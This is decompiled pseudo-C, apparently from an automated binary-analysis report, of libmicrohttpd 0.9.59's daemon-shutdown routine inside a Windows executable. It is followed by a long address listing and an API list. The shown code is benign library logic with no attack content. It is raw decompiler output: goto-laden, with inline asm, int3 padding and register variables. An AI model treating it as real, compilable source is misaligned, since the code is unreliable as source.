																				if(_t182 != 0) {
																					goto L37;
																				} else {
																					goto L30;
																				}
																			}
																		} else {
																			if(WaitForSingleObject(_t313[0x14], 0xffffffff) != 0) {
																				 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0xbdf, "Failed to join a thread\n");
																				_t347 = _t345 + 0x10;
																				L37:
																				 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0xc14, "Close socket failed.\n");
																				_t345 = _t347 + 0x10;
																				break;
																			} else {
																				CloseHandle(_t313[0x14]);
																				goto L17;
																			}
																		}
																	}
																}
																goto L180;
															}
															_push("(NULL != (pos)->next) || ((pos) == (daemon->cleanup_tail))");
															_push(0xbd9);
															_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
															_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
															goto L39;
														}
													} else {
														asm("o16 nop [eax+eax]");
														do {
															__eflags =  *(_t312 + 0xe4) & 0x00000004;
															if(( *(_t312 + 0xe4) & 0x00000004) == 0) {
																goto L108;
															} else {
																__eflags =  *((char*)(_t174 + 0xa6));
																if( *((char*)(_t174 + 0xa6)) == 0) {
																	L111:
																	_t217 =  *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x1872, "Failed to join a thread\n");
																	_t356 = _t344 + 0x10;
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t327);
																	_t339 = _t356;
																	_t357 = _t356 & 0xfffffff8;
																	_push(_t265);
																	_push(_t339);
																	_push(_t312);
																	_t322 = _t278;
																	_push(_t300);
																	__eflags = _t322;
																	if(_t322 == 0) {
																		L163:
																		return _t217;
																	} else {
																		 *((char*)(_t322 + 0xc4)) = 1;
																		__eflags =  *((char*)(_t322 + 0xc5));
																		if( *((char*)(_t322 + 0xc5)) == 0) {
																			_t342 =  *(_t322 + 0xb4);
																		} else {
																			_t342 = _t339 | 0xffffffff;
																		}
																		_t288 =  *(_t322 + 0x64);
																		_t274 = __imp__#3;
																		_t308 = DeleteCriticalSection;
																		__eflags = _t288;
																		if(_t288 == 0) {
																			_t218 =  *(_t322 + 0xe4);
																			__eflags = _t218 & 0x00000008;
																			if((_t218 & 0x00000008) == 0) {
																				E0134D150(_t274, _t322, _t293, DeleteCriticalSection);
																				goto L151;
																			} else {
																				__eflags =  *(_t322 + 0x78);
																				if( *(_t322 + 0x78) == 0) {
																					__eflags = _t218 & 0x00002000;
																					if((_t218 & 0x00002000) != 0) {
																						_t288 = _t322;
																						E0134A8B0(_t274, _t322, _t293, DeleteCriticalSection);
																						_t218 =  *(_t322 + 0xe4);
																					}
																					__eflags = _t218 & 0x00000008;
																					if((_t218 & 0x00000008) == 0) {
																						L151:
																						_t220 =  *((intOrPtr*)(_t322 + 0xbc));
																						__eflags = _t220 - 0xffffffff;
																						if(_t220 == 0xffffffff) {
																							L154:
																							_t217 = _t322 + 0x9c;
																							DeleteCriticalSection(_t217);
																						} else {
																							_t226 =  *_t274(_t220);
																							_push( *((intOrPtr*)(_t322 + 0xc0)));
																							__eflags = _t226;
																							if(_t226 != 0) {
																								 *_t274();
																								goto L156;
																							} else {
																								_t228 =  *_t274();
																								asm("sbb eax, eax");
																								__eflags =  ~_t228 + 1;
																								if( ~_t228 + 1 == 0) {
																									L156:
																									_t217 =  *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x18de, "Failed to destroy ITC.\n");
																									_t357 = _t357 + 0x10;
																									goto L157;
																								} else {
																									goto L154;
																								}
																							}
																						}
																						goto L158;
																					} else {
																						__eflags =  *((intOrPtr*)(_t322 + 0xbc)) - 0xffffffff;
																						if( *((intOrPtr*)(_t322 + 0xbc)) == 0xffffffff) {
																							L149:
																							_push("false");
																							_push(0x18ce);
																							_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
																							_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
																							goto L165;
																						} else {
																							__imp__#19( *((intOrPtr*)(_t322 + 0xc0)), "e", 1, 0);
																							__eflags = _t218;
																							if(_t218 <= 0) {
																								__imp__#111();
																								__eflags = _t218 - 0x2733;
																								if(_t218 != 0x2733) {
																									 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x18c1, "Failed to signal shutdown via inter-thread communication channel");
																									_t357 = _t357 + 0x10;
																								}
																							}
																							_t239 = WaitForSingleObject( *(_t322 + 0x7c), 0xffffffff);
																							__eflags = _t239;
																							if(_t239 != 0) {
																								 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x18d3, "Failed to join a thread\n");
																								_t357 = _t357 + 0x10;
																								goto L149;
																							} else {
																								CloseHandle( *(_t322 + 0x7c));
																								goto L151;
																							}
																						}
																					}
																				} else {
																					_push("0 == daemon->worker_pool_size");
																					_push(0x18b7);
																					_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
																					_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
																					goto L165;
																				}
																			}
																		} else {
																			_t244 =  *(_t322 + 0x78);
																			__eflags = _t244 - 1;
																			if(_t244 <= 1) {
																				_push("1 < daemon->worker_pool_size");
																				_push(0x1890);
																				_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
																				_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
																				goto L165;
																			} else {
																				__eflags =  *(_t322 + 0xe4) & 0x00000008;
																				if(( *(_t322 + 0xe4) & 0x00000008) != 0) {
																					_t274 = 0;
																					__eflags = _t244;
																					if(_t244 == 0) {
																						L129:
																						_t274 = 0;
																						__eflags = _t244;
																						if(_t244 != 0) {
																							_t310 = 0;
																							__eflags = 0;
																							do {
																								L112();
																								_t274 = _t274 + 1;
																								_t310 = _t310 + 0x120;
																								__eflags = _t274 -  *(_t322 + 0x78);
																							} while (_t274 <  *(_t322 + 0x78));
																							_t288 =  *(_t322 + 0x64);
																						}
																						_t217 = E0135C9E5(_t288);
																						_t357 = _t357 + 4;
																						__eflags =  *((intOrPtr*)(_t322 + 0xbc)) - 0xffffffff;
																						if( *((intOrPtr*)(_t322 + 0xbc)) == 0xffffffff) {
																							L157:
																							_t274 = __imp__#3;
																							L158:
																							__eflags =  *(_t322 + 0x60);
																							if( *(_t322 + 0x60) == 0) {
																								__eflags = _t342 - 0xffffffff;
																								if(_t342 != 0xffffffff) {
																									_t224 =  *_t274(_t342);
																									__eflags = _t224;
																									if(_t224 != 0) {
																										 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x18f3, "Close socket failed.\n");
																										_t357 = _t357 + 0x10;
																									}
																								}
																								E0135C9E5( *((intOrPtr*)(_t322 + 0xf4)));
																								DeleteCriticalSection(_t322 + 0xf8);
																								DeleteCriticalSection(_t322 + 0x84);
																								_t217 = E0135C9E5(_t322);
																							}
																							goto L163;
																						} else {
																							_push("MHD_ITC_IS_INVALID_(daemon->itc)");
																							_push(0x18ab);
																							_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
																							_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
																							goto L165;
																						}
																					} else {
																						_t308 = 0;
																						__eflags = 0;
																						do {
																							 *((char*)(_t308 +  *(_t322 + 0x64) + 0xc4)) = 1;
																							_t246 =  *(_t322 + 0x64);
																							__eflags =  *((intOrPtr*)(_t308 + _t246 + 0xbc)) - 0xffffffff;
																							if( *((intOrPtr*)(_t308 + _t246 + 0xbc)) == 0xffffffff) {
																								L126:
																								__eflags = _t342 - 0xffffffff;
																								if(_t342 == 0xffffffff) {
																									_push("MHD_INVALID_SOCKET != fd");
																									_push(0x189d);
																									_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
																									_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
																									goto L165;
																								} else {
																									goto L127;
																								}
																							} else {
																								__imp__#19( *((intOrPtr*)(_t308 + _t246 + 0xc0)), "e", 1, 0);
																								__eflags = _t246;
																								if(_t246 > 0) {
																									goto L127;
																								} else {
																									__imp__#111();
																									__eflags = _t246 - 0x2733;
																									if(_t246 == 0x2733) {
																										goto L127;
																									} else {
																										 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x189a, "Failed to signal shutdown via inter-thread communication channel.");
																										_t357 = _t357 + 0x10;
																										goto L126;
																									}
																								}
																							}
																							goto L180;
																							L127:
																							_t244 =  *(_t322 + 0x78);
																							_t274 = _t274 + 1;
																							_t308 = _t308 + 0x120;
																							__eflags = _t274 - _t244;
																						} while (_t274 < _t244);
																						_t288 =  *(_t322 + 0x64);
																						goto L129;
																					}
																				} else {
																					_push("0 != (daemon->options & MHD_USE_INTERNAL_POLLING_THREAD)");
																					_push(0x1891);
																					_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
																					_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
																					L165:
																					_push(E0135B8FA(2));
																					E012938B0(_t288);
																					E0135D32E(_t288, E0135B8FA(2));
																					E0135EBB9(_t274, _t288, _t293, _t308, _t322);
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					_push(_t322);
																					_t324 = _v44;
																					__eflags = _t324;
																					if(_t324 == 0) {
																						L179:
																						__eflags = 0;
																						return 0;
																					} else {
																						_t237 = _v40;
																						__eflags = _t237 - 6;
																						if(_t237 > 6) {
																							goto L179;
																						} else {
																							switch( *((intOrPtr*)(_t237 * 4 +  &M0134D7B0))) {
																								case 0:
																									goto L179;
																								case 1:
																									return _t324 + 0xb4;
																									goto L180;
																								case 2:
																									__eflags =  *(__esi + 0xe4) & 0x00000008;
																									if(( *(__esi + 0xe4) & 0x00000008) != 0) {
																										__ecx =  *(__esi + 0x64);
																										__eflags = __ecx;
																										if(__ecx != 0) {
																											__edx =  *(__esi + 0x78);
																											 *(__esi + 0xcc) = 0;
																											__eflags = __edx;
																											if(__edx != 0) {
																												__eax = 0;
																												__ecx = __ecx + 0xcc;
																												__eflags = __ecx;
																												do {
																													__eax = __eax +  *__ecx;
																													__ecx = __ecx + 0x120;
																													 *(__esi + 0xcc) = __eax;
																													__edx = __edx - 1;
																													__eflags = __edx;
																												} while (__edx != 0);
																											}
																										}
																										__eax = __esi + 0xcc;
																										_pop(__esi);
																										return __esi + 0xcc;
																									} else {
																										__ecx = __esi;
																										L1();
																										__eax = __esi + 0xcc;
																										_pop(__esi);
																										return __esi + 0xcc;
																									}
																									goto L180;
																								case 3:
																									__eax = __esi + 0xe4;
																									_pop(__esi);
																									return __esi + 0xe4;
																									goto L180;
																								case 4:
																									__eax = __esi + 0xe8;
																									_pop(__esi);
																									return __esi + 0xe8;
																									goto L180;
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																} else {
																	goto L108;
																}
															}
															goto L180;
															L108:
															_t278 = _t174;
															E0134BE20(_t174, _t265, _t278, _t300);
															_t174 =  *(_t312 + 0xc);
															__eflags = _t174;
														} while (_t174 != 0);
														goto L109;
													}
												}
											} else {
												goto L88;
											}
										}
									}
								}
								goto L180;
								L88:
								_t300 =  *(_t300 + 4);
								__eflags = _t300;
							} while (_t300 != 0);
							goto L89;
						}
					} else {
						while(1) {
							_t258 =  *(_t300 + 0xd8);
							__eflags = _t258;
							if(_t258 == 0) {
								break;
							}
							__eflags =  *((char*)(_t258 + 4));
							if( *((char*)(_t258 + 4)) == 0) {
								_push("Initiated daemon shutdown while \"upgraded\" connection was not closed.\n");
								_push(_t312);
								E01351E90();
								_t344 = _t344 + 8;
							}
							 *((char*)( *(_t300 + 0xd8) + 4)) = 1;
							 *((char*)(_t300 + 0xe4)) = 1;
							 *((char*)(_t312 + 0xc7)) = 1;
							_t300 =  *(_t300 + 4);
							__eflags = _t300;
							if(_t300 != 0) {
								continue;
							} else {
								goto L82;
							}
							goto L180;
						}
						 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x181e, "MHD_stop_daemon() called while we have suspended connections.\n");
						_t344 = _t344 + 0x10;
						goto L96;
					}
				}
				L180:
			}










































































                                                0x0134d150
                                                0x0134d150
                                                0x0134d150
                                                0x0134d153
                                                0x0134d154
                                                0x0134d156
                                                0x0134d158
                                                0x0134d159
                                                0x0134d169
                                                0x0134d16f
                                                0x0134d175
                                                0x0134d179
                                                0x0134d182
                                                0x0134d184
                                                0x0134d186
                                                0x0134d18d
                                                0x0134d18d
                                                0x0134d199
                                                0x0134d19f
                                                0x0134d1a1
                                                0x0134d2d7
                                                0x0134d2d7
                                                0x0134d2db
                                                0x00000000
                                                0x0134d2e1
                                                0x0134d2f6
                                                0x0134d2fc
                                                0x00000000
                                                0x0134d2fc
                                                0x0134d1a7
                                                0x0134d1a7
                                                0x0134d1aa
                                                0x0134d1ac
                                                0x0134d1f1
                                                0x0134d1f1
                                                0x0134d1f4
                                                0x0134d1f6
                                                0x0134d250
                                                0x0134d250
                                                0x0134d255
                                                0x0134d25b
                                                0x00000000
                                                0x0134d261
                                                0x0134d261
                                                0x0134d264
                                                0x0134d266
                                                0x00000000
                                                0x0134d26c
                                                0x0134d26c
                                                0x00000000
                                                0x0134d26c
                                                0x0134d266
                                                0x0134d1f8
                                                0x0134d1f8
                                                0x0134d1fe
                                                0x0134d204
                                                0x0134d20c
                                                0x0134d20e
                                                0x0134d218
                                                0x00000000
                                                0x0134d21a
                                                0x0134d21a
                                                0x0134d221
                                                0x00000000
                                                0x0134d223
                                                0x0134d232
                                                0x0134d238
                                                0x0134d23a
                                                0x00000000
                                                0x0134d23c
                                                0x0134d23c
                                                0x0134d23e
                                                0x0134d243
                                                0x0134d2ff
                                                0x0134d314
                                                0x0134d31a
                                                0x0134d31d
                                                0x0134d31d
                                                0x0134d320
                                                0x0134d320
                                                0x0134d322
                                                0x0134d272
                                                0x0134d272
                                                0x0134d279
                                                0x00000000
                                                0x0134d27f
                                                0x0134d286
                                                0x0134d28d
                                                0x0134d293
                                                0x0134d295
                                                0x0134d3a6
                                                0x0134d3ac
                                                0x00000000
                                                0x0134d29b
                                                0x0134d29e
                                                0x0134d2a7
                                                0x0134d2ad
                                                0x0134d2b4
                                                0x00000000
                                                0x0134d2b4
                                                0x0134d295
                                                0x0134d330
                                                0x0134d330
                                                0x0134d337
                                                0x0134d339
                                                0x0134d33e
                                                0x0134d340
                                                0x0134d342
                                                0x0134d349
                                                0x0134d349
                                                0x0134d34e
                                                0x0134d351
                                                0x0134d353
                                                0x0134d383
                                                0x0134d383
                                                0x0134d386
                                                0x0134d387
                                                0x0134d388
                                                0x0134d389
                                                0x0134ae20
                                                0x0134ae23
                                                0x0134ae26
                                                0x0134ae27
                                                0x0134ae28
                                                0x0134ae2a
                                                0x0134ae2c
                                                0x0134ae33
                                                0x0134ae39
                                                0x0134ae3c
                                                0x0134ae44
                                                0x0134afb0
                                                0x0134afba
                                                0x0134ae4a
                                                0x0134ae4a
                                                0x0134ae50
                                                0x0134ae50
                                                0x0134ae54
                                                0x00000000
                                                0x00000000
                                                0x0134ae5e
                                                0x0134ae63
                                                0x0134ae77
                                                0x0134ae77
                                                0x00000000
                                                0x0134ae65
                                                0x0134ae68
                                                0x0134afbb
                                                0x0134afc0
                                                0x0134afc5
                                                0x0134afca
                                                0x0134b021
                                                0x0134b02b
                                                0x0134b02c
                                                0x0134b03f
                                                0x0134b044
                                                0x0134b047
                                                0x0134b04c
                                                0x0134b04d
                                                0x0134b04e
                                                0x0134b04f
                                                0x0134b050
                                                0x0134b053
                                                0x0134b05d
                                                0x0134b05f
                                                0x0134b060
                                                0x0134b061
                                                0x0134b062
                                                0x0134b063
                                                0x0134b067
                                                0x0134b06b
                                                0x0134b085
                                                0x0134b08c
                                                0x0134b0a8
                                                0x0134b0ab
                                                0x0134b0ae
                                                0x0134b0b4
                                                0x0134b0b6
                                                0x0134b0ba
                                                0x0134b0be
                                                0x0134b0c0
                                                0x0134b0c2
                                                0x0134b0c8
                                                0x0134b0ce
                                                0x0134b0d0
                                                0x0134b0d6
                                                0x0134b0d6
                                                0x0134b0d8
                                                0x0134b0f4
                                                0x0134b0fa
                                                0x0134b100
                                                0x0134b102
                                                0x0134b0da
                                                0x0134b0de
                                                0x0134b0e4
                                                0x0134b0ea
                                                0x0134b0ec
                                                0x0134b0ee
                                                0x00000000
                                                0x0134b0f0
                                                0x0134b0f0
                                                0x0134b0f2
                                                0x00000000
                                                0x00000000
                                                0x0134b0f2
                                                0x0134b0ee
                                                0x0134b0ec
                                                0x0134b104
                                                0x0134b0d2
                                                0x0134b0d2
                                                0x0134b0d4
                                                0x00000000
                                                0x00000000
                                                0x0134b0d4
                                                0x0134b106
                                                0x0134b109
                                                0x0134b109
                                                0x0134b111
                                                0x0134b114
                                                0x0134b116
                                                0x0134b15c
                                                0x0134b15c
                                                0x0134b15e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134b118
                                                0x0134b118
                                                0x0134b11e
                                                0x0134b124
                                                0x0134b126
                                                0x0134b12c
                                                0x0134b12c
                                                0x0134b12e
                                                0x0134b14a
                                                0x0134b150
                                                0x0134b156
                                                0x0134b158
                                                0x0134b130
                                                0x0134b132
                                                0x0134b134
                                                0x0134b136
                                                0x0134b138
                                                0x0134b13e
                                                0x0134b140
                                                0x00000000
                                                0x0134b142
                                                0x0134b142
                                                0x0134b148
                                                0x00000000
                                                0x00000000
                                                0x0134b148
                                                0x0134b140
                                                0x0134b13e
                                                0x0134b164
                                                0x0134b164
                                                0x0134b172
                                                0x0134b17f
                                                0x0134b184
                                                0x0134b186
                                                0x0134b1a1
                                                0x0134b1a1
                                                0x0134b1a3
                                                0x0134b1a5
                                                0x0134b1ab
                                                0x0134b1bf
                                                0x0134b1ca
                                                0x0134b1cc
                                                0x0134b1ce
                                                0x0134b1ce
                                                0x0134b1ad
                                                0x0134b1ad
                                                0x0134b1b7
                                                0x0134b1b7
                                                0x0134b1ba
                                                0x0134b1af
                                                0x0134b1af
                                                0x0134b1b5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134b1b5
                                                0x0134b1ad
                                                0x0134b188
                                                0x0134b188
                                                0x0134b18e
                                                0x0134b18e
                                                0x0134b191
                                                0x0134b197
                                                0x0134b19b
                                                0x0134b18a
                                                0x0134b18a
                                                0x0134b18c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134b18c
                                                0x0134b188
                                                0x0134b1d0
                                                0x0134b1d7
                                                0x0134b1de
                                                0x0134b1e5
                                                0x0134b128
                                                0x0134b128
                                                0x0134b12a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134b12a
                                                0x0134b126
                                                0x0134b08e
                                                0x0134b08e
                                                0x0134b094
                                                0x0134b0a7
                                                0x0134b0a7
                                                0x0134b06d
                                                0x0134b06d
                                                0x0134b072
                                                0x0134b073
                                                0x0134b078
                                                0x0134b07b
                                                0x0134b07b
                                                0x0134b084
                                                0x0134b084
                                                0x0134ae6e
                                                0x0134ae70
                                                0x00000000
                                                0x0134ae72
                                                0x0134ae72
                                                0x0134ae72
                                                0x0134ae79
                                                0x0134ae79
                                                0x0134ae7b
                                                0x0134ae80
                                                0x0134ae87
                                                0x0134ae82
                                                0x0134ae82
                                                0x0134ae82
                                                0x0134ae8b
                                                0x0134ae91
                                                0x0134ae98
                                                0x0134aea4
                                                0x0134aecb
                                                0x0134aecb
                                                0x0134aed3
                                                0x0134aed6
                                                0x0134aee0
                                                0x0134aee5
                                                0x0134aee5
                                                0x0134aee8
                                                0x0134aeed
                                                0x0134aef3
                                                0x0134aef5
                                                0x0134af0a
                                                0x0134aef7
                                                0x0134aef8
                                                0x0134aefd
                                                0x0134aefd
                                                0x0134af11
                                                0x0134af16
                                                0x0134af16
                                                0x0134af19
                                                0x0134af1e
                                                0x0134af2a
                                                0x0134af2c
                                                0x0134af2c
                                                0x0134af3a
                                                0x0134af3f
                                                0x0134af42
                                                0x0134af47
                                                0x0134af49
                                                0x0134af4e
                                                0x0134af4e
                                                0x0134af55
                                                0x0134af5e
                                                0x0134af6f
                                                0x0134af6f
                                                0x0134af74
                                                0x0134af77
                                                0x0134af7c
                                                0x0134af7c
                                                0x0134af80
                                                0x0134af85
                                                0x0134af89
                                                0x0134af8f
                                                0x0134af95
                                                0x0134af9b
                                                0x0134afa2
                                                0x0134afa5
                                                0x0134afa9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134af60
                                                0x0134af61
                                                0x0134af69
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134af69
                                                0x0134aeaf
                                                0x0134aebc
                                                0x0134afe6
                                                0x0134afec
                                                0x0134afef
                                                0x0134b004
                                                0x0134b00a
                                                0x00000000
                                                0x0134aec2
                                                0x0134aec5
                                                0x00000000
                                                0x0134aec5
                                                0x0134aebc
                                                0x0134aea4
                                                0x0134ae68
                                                0x00000000
                                                0x0134ae63
                                                0x0134b00d
                                                0x0134b012
                                                0x0134b017
                                                0x0134b01c
                                                0x00000000
                                                0x0134b01c
                                                0x0134d355
                                                0x0134d355
                                                0x0134d360
                                                0x0134d360
                                                0x0134d36a
                                                0x00000000
                                                0x0134d36c
                                                0x0134d36c
                                                0x0134d373
                                                0x0134d3af
                                                0x0134d3c4
                                                0x0134d3ca
                                                0x0134d3cd
                                                0x0134d3ce
                                                0x0134d3cf
                                                0x0134d3d0
                                                0x0134d3d1
                                                0x0134d3d3
                                                0x0134d3d6
                                                0x0134d3d7
                                                0x0134d3d8
                                                0x0134d3d9
                                                0x0134d3db
                                                0x0134d3dc
                                                0x0134d3de
                                                0x0134d6d3
                                                0x0134d6da
                                                0x0134d3e4
                                                0x0134d3e4
                                                0x0134d3eb
                                                0x0134d3f2
                                                0x0134d3f9
                                                0x0134d3f4
                                                0x0134d3f4
                                                0x0134d3f4
                                                0x0134d3ff
                                                0x0134d402
                                                0x0134d408
                                                0x0134d40e
                                                0x0134d410
                                                0x0134d531
                                                0x0134d537
                                                0x0134d539
                                                0x0134d61a
                                                0x00000000
                                                0x0134d53f
                                                0x0134d53f
                                                0x0134d543
                                                0x0134d55e
                                                0x0134d563
                                                0x0134d565
                                                0x0134d567
                                                0x0134d56c
                                                0x0134d56c
                                                0x0134d572
                                                0x0134d574
                                                0x0134d61f
                                                0x0134d61f
                                                0x0134d625
                                                0x0134d628
                                                0x0134d643
                                                0x0134d643
                                                0x0134d64a
                                                0x0134d62a
                                                0x0134d62b
                                                0x0134d633
                                                0x0134d634
                                                0x0134d636
                                                0x0134d64e
                                                0x00000000
                                                0x0134d638
                                                0x0134d638
                                                0x0134d63c
                                                0x0134d63e
                                                0x0134d641
                                                0x0134d650
                                                0x0134d665
                                                0x0134d66b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d641
                                                0x0134d636
                                                0x00000000
                                                0x0134d57a
                                                0x0134d57a
                                                0x0134d581
                                                0x0134d5ff
                                                0x0134d5ff
                                                0x0134d604
                                                0x0134d609
                                                0x0134d60e
                                                0x00000000
                                                0x0134d583
                                                0x0134d592
                                                0x0134d598
                                                0x0134d59a
                                                0x0134d59c
                                                0x0134d5a2
                                                0x0134d5a7
                                                0x0134d5be
                                                0x0134d5c4
                                                0x0134d5c4
                                                0x0134d5a7
                                                0x0134d5cc
                                                0x0134d5d2
                                                0x0134d5d4
                                                0x0134d5f6
                                                0x0134d5fc
                                                0x00000000
                                                0x0134d5d6
                                                0x0134d5d9
                                                0x00000000
                                                0x0134d5d9
                                                0x0134d5d4
                                                0x0134d581
                                                0x0134d545
                                                0x0134d545
                                                0x0134d54a
                                                0x0134d54f
                                                0x0134d554
                                                0x00000000
                                                0x0134d554
                                                0x0134d543
                                                0x0134d416
                                                0x0134d416
                                                0x0134d419
                                                0x0134d41c
                                                0x0134d6db
                                                0x0134d6e0
                                                0x0134d6e5
                                                0x0134d6ea
                                                0x00000000
                                                0x0134d422
                                                0x0134d422
                                                0x0134d42c
                                                0x0134d447
                                                0x0134d449
                                                0x0134d44b
                                                0x0134d4c3
                                                0x0134d4c3
                                                0x0134d4c5
                                                0x0134d4c7
                                                0x0134d4c9
                                                0x0134d4c9
                                                0x0134d4d0
                                                0x0134d4d5
                                                0x0134d4da
                                                0x0134d4db
                                                0x0134d4e1
                                                0x0134d4e1
                                                0x0134d4e6
                                                0x0134d4e6
                                                0x0134d4ea
                                                0x0134d4ef
                                                0x0134d4f2
                                                0x0134d4f9
                                                0x0134d66e
                                                0x0134d66e
                                                0x0134d67a
                                                0x0134d67a
                                                0x0134d67e
                                                0x0134d680
                                                0x0134d683
                                                0x0134d686
                                                0x0134d688
                                                0x0134d68a
                                                0x0134d6a1
                                                0x0134d6a7
                                                0x0134d6a7
                                                0x0134d68a
                                                0x0134d6b0
                                                0x0134d6bf
                                                0x0134d6c8
                                                0x0134d6cb
                                                0x0134d6d0
                                                0x00000000
                                                0x0134d4ff
                                                0x0134d4ff
                                                0x0134d504
                                                0x0134d509
                                                0x0134d50e
                                                0x00000000
                                                0x0134d50e
                                                0x0134d44d
                                                0x0134d44d
                                                0x0134d44d
                                                0x0134d450
                                                0x0134d453
                                                0x0134d45b
                                                0x0134d45e
                                                0x0134d466
                                                0x0134d4ad
                                                0x0134d4ad
                                                0x0134d4b0
                                                0x0134d518
                                                0x0134d51d
                                                0x0134d522
                                                0x0134d527
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d468
                                                0x0134d478
                                                0x0134d47e
                                                0x0134d480
                                                0x00000000
                                                0x0134d482
                                                0x0134d482
                                                0x0134d488
                                                0x0134d48d
                                                0x00000000
                                                0x0134d48f
                                                0x0134d4a4
                                                0x0134d4aa
                                                0x00000000
                                                0x0134d4aa
                                                0x0134d48d
                                                0x0134d480
                                                0x00000000
                                                0x0134d4b2
                                                0x0134d4b2
                                                0x0134d4b5
                                                0x0134d4b6
                                                0x0134d4bc
                                                0x0134d4bc
                                                0x0134d4c0
                                                0x00000000
                                                0x0134d4c0
                                                0x0134d42e
                                                0x0134d42e
                                                0x0134d433
                                                0x0134d438
                                                0x0134d43d
                                                0x0134d6ef
                                                0x0134d6f9
                                                0x0134d6fa
                                                0x0134d70d
                                                0x0134d715
                                                0x0134d71a
                                                0x0134d71b
                                                0x0134d71c
                                                0x0134d71d
                                                0x0134d71e
                                                0x0134d71f
                                                0x0134d720
                                                0x0134d721
                                                0x0134d725
                                                0x0134d727
                                                0x0134d7ab
                                                0x0134d7ab
                                                0x0134d7ae
                                                0x0134d72d
                                                0x0134d72d
                                                0x0134d731
                                                0x0134d734
                                                0x00000000
                                                0x0134d736
                                                0x0134d736
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d744
                                                0x00000000
                                                0x00000000
                                                0x0134d745
                                                0x0134d74f
                                                0x0134d760
                                                0x0134d763
                                                0x0134d765
                                                0x0134d767
                                                0x0134d76a
                                                0x0134d774
                                                0x0134d776
                                                0x0134d778
                                                0x0134d77a
                                                0x0134d77a
                                                0x0134d780
                                                0x0134d780
                                                0x0134d782
                                                0x0134d788
                                                0x0134d78e
                                                0x0134d78e
                                                0x0134d78e
                                                0x0134d780
                                                0x0134d776
                                                0x0134d793
                                                0x0134d799
                                                0x0134d79a
                                                0x0134d751
                                                0x0134d751
                                                0x0134d753
                                                0x0134d758
                                                0x0134d75e
                                                0x0134d75f
                                                0x0134d75f
                                                0x00000000
                                                0x00000000
                                                0x0134d79b
                                                0x0134d7a1
                                                0x0134d7a2
                                                0x00000000
                                                0x00000000
                                                0x0134d7a3
                                                0x0134d7a9
                                                0x0134d7aa
                                                0x00000000
                                                0x00000000
                                                0x0134d736
                                                0x0134d734
                                                0x0134d727
                                                0x0134d42c
                                                0x0134d41c
                                                0x0134d410
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d373
                                                0x00000000
                                                0x0134d375
                                                0x0134d375
                                                0x0134d377
                                                0x0134d37c
                                                0x0134d37f
                                                0x0134d37f
                                                0x00000000
                                                0x0134d360
                                                0x0134d353
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d243
                                                0x0134d23a
                                                0x0134d221
                                                0x00000000
                                                0x0134d249
                                                0x0134d249
                                                0x0134d24c
                                                0x0134d24c
                                                0x00000000
                                                0x0134d204
                                                0x0134d1b0
                                                0x0134d1b0
                                                0x0134d1b0
                                                0x0134d1b6
                                                0x0134d1b8
                                                0x00000000
                                                0x00000000
                                                0x0134d1be
                                                0x0134d1c2
                                                0x0134d1c4
                                                0x0134d1c9
                                                0x0134d1ca
                                                0x0134d1cf
                                                0x0134d1cf
                                                0x0134d1d8
                                                0x0134d1dc
                                                0x0134d1e3
                                                0x0134d1ea
                                                0x0134d1ed
                                                0x0134d1ef
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d1ef
                                                0x0134d2ce
                                                0x0134d2d4
                                                0x00000000
                                                0x0134d2d4
                                                0x0134d1ac
                                                0x00000000

                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,7710A080,?,?,73ECED70), ref: 0134D199
